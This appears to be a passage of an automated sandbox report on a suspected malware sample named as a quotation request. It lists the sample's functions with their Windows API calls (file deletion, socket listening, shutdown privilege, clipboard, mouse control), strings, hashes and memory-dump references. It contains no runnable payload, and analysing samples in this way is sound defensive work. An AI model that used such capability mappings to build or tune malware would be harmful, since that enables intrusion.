                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F7D264
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 1946585618-1173974218
                                                                                                                    • Opcode ID: f6dae162abc41bcf3d101d36a273cd16b8f3ea496aa0ada3e744f760e158c248
                                                                                                                    • Instruction ID: a5e34854a9ba7e34fc1cbf11fa12212be3a4ceefbb91f91ac0290d5c650f9207
                                                                                                                    • Opcode Fuzzy Hash: f6dae162abc41bcf3d101d36a273cd16b8f3ea496aa0ada3e744f760e158c248
                                                                                                                    • Instruction Fuzzy Hash: B1618F71C0510D9ACF05EBE0CD529EDB7B5AF15310FA48066E406B7192EB346F4AEBA1
                                                                                                                    Function 00F8ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1737998785-0
                                                                                                                    • Opcode ID: c8345da6347a9fee01f9f4a10a019af9c9a3f77ef2e71c99c620aec145ea2e31
                                                                                                                    • Instruction ID: 0662c757a048f5a8ba1c2b4784c924e15538fd21bed35469c4ac288a58da2ae8
                                                                                                                    • Opcode Fuzzy Hash: c8345da6347a9fee01f9f4a10a019af9c9a3f77ef2e71c99c620aec145ea2e31
                                                                                                                    • Instruction Fuzzy Hash: 2D41AB75604611AFE320EF15D888B99BBE1FF45328F15C099E4198B7A2C735EC42EBD0
                                                                                                                    Function 00F7E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F7170D
                                                                                                                      • Part of subcall function 00F716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F7173A
                                                                                                                      • Part of subcall function 00F716C3: GetLastError.KERNEL32 ref: 00F7174A
                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00F7E932
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                                                                    • API String ID: 2234035333-3163812486
                                                                                                                    • Opcode ID: b9c65f1c88f8f6aed5ecbe9fe498e4ab52d56939d8586f6072db527a31192a76
                                                                                                                    • Instruction ID: 2f43180bf7f2401d10ef85c1f5dcd9b9ec2a1cb15350829a4fcf6dfa0649efbb
                                                                                                                    • Opcode Fuzzy Hash: b9c65f1c88f8f6aed5ecbe9fe498e4ab52d56939d8586f6072db527a31192a76
                                                                                                                    • Instruction Fuzzy Hash: 03012B73A10214AFEB6426749C85BBB727CA718750F148463FA07E21D1D6645C40B2D2
                                                                                                                    Function 00F91204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F91276
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00F91283
                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00F912BA
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00F912C5
                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00F912F4
                                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00F91303
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00F9130D
                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00F9133C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 540024437-0
                                                                                                                    • Opcode ID: b4a06e2b615e8a161ce99da1dedac1b14b12d1e7c3af4dce3d392e5a771608b0
                                                                                                                    • Instruction ID: e751cf3d82622caae5e7643065ecce5dfef0c37df448124e86f6600aff1c25cf
                                                                                                                    • Opcode Fuzzy Hash: b4a06e2b615e8a161ce99da1dedac1b14b12d1e7c3af4dce3d392e5a771608b0
                                                                                                                    • Instruction Fuzzy Hash: 2B41A471A001059FEB10EF24C488B69BBF6BF46328F188198D8568F2D6C775EC81DBE1
                                                                                                                    Function 00F4B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00F4B9D4
                                                                                                                    • _free.LIBCMT ref: 00F4B9F8
                                                                                                                    • _free.LIBCMT ref: 00F4BB7F
                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00FB3700), ref: 00F4BB91
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00FE121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00F4BC09
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00FE1270,000000FF,?,0000003F,00000000,?), ref: 00F4BC36
                                                                                                                    • _free.LIBCMT ref: 00F4BD4B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 314583886-0
                                                                                                                    • Opcode ID: d1370393a6d74236c1fc077c50b8fc252e60fbd37317ac6ba056cff4079dd45d
                                                                                                                    • Instruction ID: ee5b4c34ef0ceda141c4fec90fc892d0e77906839d373af4d6c2ea5651f189aa
                                                                                                                    • Opcode Fuzzy Hash: d1370393a6d74236c1fc077c50b8fc252e60fbd37317ac6ba056cff4079dd45d
                                                                                                                    • Instruction Fuzzy Hash: FAC10571E04249AFDB209F698C81BAA7FB9EF41320F14419AED90DB253EB34DE41B750
                                                                                                                    Function 00F7D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F13A97,?,?,00F12E7F,?,?,?,00000000), ref: 00F13AC2
                                                                                                                      • Part of subcall function 00F7E199: GetFileAttributesW.KERNEL32(?,00F7CF95), ref: 00F7E19A
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F7D420
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F7D470
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F7D481
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F7D498
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F7D4A1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                    • Opcode ID: bf173f75b45fe70e3f8a0487e2ff05996368048b44ea09d8d1b955f7c0320291
                                                                                                                    • Instruction ID: 04334f842756f49a99e5088c143a72eb11aef5816604cfaec261dc042313041e
                                                                                                                    • Opcode Fuzzy Hash: bf173f75b45fe70e3f8a0487e2ff05996368048b44ea09d8d1b955f7c0320291
                                                                                                                    • Instruction Fuzzy Hash: A73190710083459BC304EF64CC519EFB7E8AE92314F848A1EF4D593191EB34AA49EBA3
                                                                                                                    Function 00F4E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __floor_pentium4
                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                    • Opcode ID: 32df9c12351c7f1a9c3365fdb991465147fe2743cf45a177df49d71ecb6f43f0
                                                                                                                    • Instruction ID: b7665c229070ef32eef16451079936b7a431c2ab7588c134a7705dd9b171501d
                                                                                                                    • Opcode Fuzzy Hash: 32df9c12351c7f1a9c3365fdb991465147fe2743cf45a177df49d71ecb6f43f0
                                                                                                                    • Instruction Fuzzy Hash: ACC23B72E046288FDB25CE28DD407EABBB5FB84315F1541EAD84DE7240E778AE859F40
                                                                                                                    Function 00F8648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00F864DC
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00F86639
                                                                                                                    • CoCreateInstance.OLE32(00FAFCF8,00000000,00000001,00FAFB68,?), ref: 00F86650
                                                                                                                    • CoUninitialize.OLE32 ref: 00F868D4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 886957087-24824748
                                                                                                                    • Opcode ID: 504f754559eb83b913bda27282ecc79ed04c87d0c423d0f5336c7399a53630e9
                                                                                                                    • Instruction ID: e1573bdb9b454a334bb33ad57cee9a520a69e33b30388074c21694e32b58f334
                                                                                                                    • Opcode Fuzzy Hash: 504f754559eb83b913bda27282ecc79ed04c87d0c423d0f5336c7399a53630e9
                                                                                                                    • Instruction Fuzzy Hash: 31D15971508301AFC304EF24C891AABB7E8FF98714F04496DF595CB291EB74E949DBA2
                                                                                                                    Function 00F922DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 00F922E8
                                                                                                                      • Part of subcall function 00F8E4EC: GetWindowRect.USER32(?,?), ref: 00F8E504
                                                                                                                    • GetDesktopWindow.USER32 ref: 00F92312
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00F92319
                                                                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00F92355
                                                                                                                    • GetCursorPos.USER32(?), ref: 00F92381
                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F923DF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2387181109-0
                                                                                                                    • Opcode ID: f138b892ee6b0ca1c9a693b696b445c710208ba6a8245b9ace561d3c26547457
                                                                                                                    • Instruction ID: a312c033bdeba653701527bbb9193155db2a33f4ad8e8ad5fdfb1f3b1c6d10a8
                                                                                                                    • Opcode Fuzzy Hash: f138b892ee6b0ca1c9a693b696b445c710208ba6a8245b9ace561d3c26547457
                                                                                                                    • Instruction Fuzzy Hash: A2319E72905319AFDB20DF54C849E5BB7A9FF89314F00091AF98997191DB34E908DB92
                                                                                                                    Function 00F89B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00F89B78
                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00F89C8B
                                                                                                                      • Part of subcall function 00F83874: GetInputState.USER32 ref: 00F838CB
                                                                                                                      • Part of subcall function 00F83874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F83966
                                                                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00F89BA8
                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00F89C75
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1972594611-438819550
                                                                                                                    • Opcode ID: 51f8cd909850be78c5b130b94d843bf6d226d3ce3bd118df6e468693130526b0
                                                                                                                    • Instruction ID: 121f36306c4bcbf7714ed9d163cae25b312a90738dd630cbd45ca75039839214
                                                                                                                    • Opcode Fuzzy Hash: 51f8cd909850be78c5b130b94d843bf6d226d3ce3bd118df6e468693130526b0
                                                                                                                    • Instruction Fuzzy Hash: 0B418371D0420A9FCF15EF64CC45AEE7BF4EF46320F144056E815A2191EB759E84EFA1
                                                                                                                    Function 00F2997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00F29A4E
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00F29B23
                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00F29B36
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$LongProcWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3131106179-0
                                                                                                                    • Opcode ID: 6ed705caf61efac0058ade3ab9fa9bbbb2352131a1226811d4c8441af9b1a6a7
                                                                                                                    • Instruction ID: ef3bb4e62abb77f3b3e90a9a44f44158690e0c0478094988d0d3f19093474022
                                                                                                                    • Opcode Fuzzy Hash: 6ed705caf61efac0058ade3ab9fa9bbbb2352131a1226811d4c8441af9b1a6a7
                                                                                                                    • Instruction Fuzzy Hash: 8FA14BB190C264AEE724AA3DAC98F7F369DEF43364F140119F402C7591CAAD9D41F671
                                                                                                                    Function 00F91806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F9304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F9307A
                                                                                                                      • Part of subcall function 00F9304E: _wcslen.LIBCMT ref: 00F9309B
                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F9185D
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00F91884
                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00F918DB
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00F918E6
                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00F91915
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1601658205-0
                                                                                                                    • Opcode ID: 3d192cc2732d328d40e652eb338affaa75268ca936c56e76f47954f5a63310e0
                                                                                                                    • Instruction ID: 671626fee31d92be16a7df21cd083a90604f64586f56388de2e500f28422862d
                                                                                                                    • Opcode Fuzzy Hash: 3d192cc2732d328d40e652eb338affaa75268ca936c56e76f47954f5a63310e0
                                                                                                                    • Instruction Fuzzy Hash: 6851B471A002109FEB10EF24D886F6A77E5AB45718F088058F9159F3D3DB75AD41EBE1
                                                                                                                    Function 00FA1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 292994002-0
                                                                                                                    • Opcode ID: b71fe456defea251c41baf48f606f4e8b3f8726e879aef913f541142bbf38ca5
                                                                                                                    • Instruction ID: cc752b148cebdafac3f3bfba254acc7513a1180aea588a84bbfc930f4a9bf419
                                                                                                                    • Opcode Fuzzy Hash: b71fe456defea251c41baf48f606f4e8b3f8726e879aef913f541142bbf38ca5
                                                                                                                    • Instruction Fuzzy Hash: 3721A6B1B402155FD7208F1AC844BA67BE5FF86334F1A8058E8468B351C775EC42EBD4
                                                                                                                    Function 00F18060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                    • API String ID: 0-1546025612
                                                                                                                    • Opcode ID: 8fb11b3f419f5907818f009c4094adcf53fe76ee110bfd6cd585696356fbd22d
                                                                                                                    • Instruction ID: 09825318d2da924827cb65f914169c3a8859b0eb85784619a54587248d313422
                                                                                                                    • Opcode Fuzzy Hash: 8fb11b3f419f5907818f009c4094adcf53fe76ee110bfd6cd585696356fbd22d
